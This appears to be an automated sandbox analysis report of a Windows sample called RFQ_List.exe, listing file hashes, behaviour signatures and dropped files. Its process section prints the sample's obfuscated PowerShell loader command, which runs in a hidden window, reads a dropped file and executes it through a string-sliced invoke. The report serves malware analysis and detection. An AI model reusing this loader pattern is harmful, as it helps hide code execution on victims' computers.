Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
23-10-2024 04:26
General
-
Target
RFQ_List.exe
-
Size
905KB
-
MD5
27393ac93e0c60c934afa5ccdfc7c529
-
SHA1
e1989ce514efd53819be62e8aa4c51975da0b3e0
-
SHA256
66f7ca7287b5118119d8e6b8d55222d7662da16c12345a6122a28b64702ae69b
-
SHA512
672583e3937f3f5f5e84843913da032d5f6d6d32c759758e37710dff340973f9f0c77fb8f5b7b176b26edddec5851aa4902deb103b277b7403ea57d88292b438
-
SSDEEP
24576:dbusrIDaWLwBhB9XE/2D6lm7Pytae6/B1GX:SX8zB9XQ2gm7OjGB1GX
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\RFQ_List.exe"C:\Users\Admin\AppData\Local\Temp\RFQ_List.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
803B
MD547027ef7e3a1709e131ffb08a50b6be2
SHA11516a214287a748dd3e02d73d8373a0baeddf352
SHA2564997726a61b3c10d6a7ed878463f680007b13dcd9533aa310b28888967d17d32
SHA51290d60995db3dca664f59a3780e7b141bc66fee80034d0372e2e8e90baf6acbc6ed8ca6da25e8d937a24b4aec057c260762fd351e4dd73f1a7aa179a4d87298ff
-
Filesize
849B
MD56360326ff32b3e9c06a20d4e2b8560c8
SHA17eb8fc3a299adff3332a7b2c962137df4431cf9e
SHA2569b3ad140abafc7c5d962bf9fcb5863cc54125ba0a81abdb0448600160708d4c1
SHA5126b777dce919e436ce80fd52d48b9ffb335e646853be7f2bb64fe4635ded2bd35506f500af339ea921d7a5dbe93b173874956f77c783c06f7c86261ac7b49f87a
-
Filesize
7KB
MD5246f20abc9303cac0ac1a5b794f29e3c
SHA16c52949eef9c1a891ccb3cc8d3e755c77e19e8af
SHA256e2ff6604232c901f41332b2f2b85909ce9a9ccd84937121467d00c4f9d060437
SHA5128e794823f6c2619de9bf6bd4296a6d24cf34246d6eab8abc02810f4488ab2eaeadc4423ab9c75ce93b9a3c1fc819d575c6f39911c31da2c80f5e94419bdfef06
-
Filesize
32B
MD553898e643bd3e0ca22a462325ad62da4
SHA1e0f08a75fa5219f39e49c1b9f361119905da7d02
SHA256b947991000aea669ebfeadfb12de45121d46ad3dfd02296f373f9bf8ce4f1aff
SHA512aa17b99a93a04f7bbbb92f34c15921da80e20592a39b3921f1d3cc59fae55f66196b2be4f56716846daff041253cb63d7e373b84234d451181c87f1d097fe8ca
-
Filesize
4KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB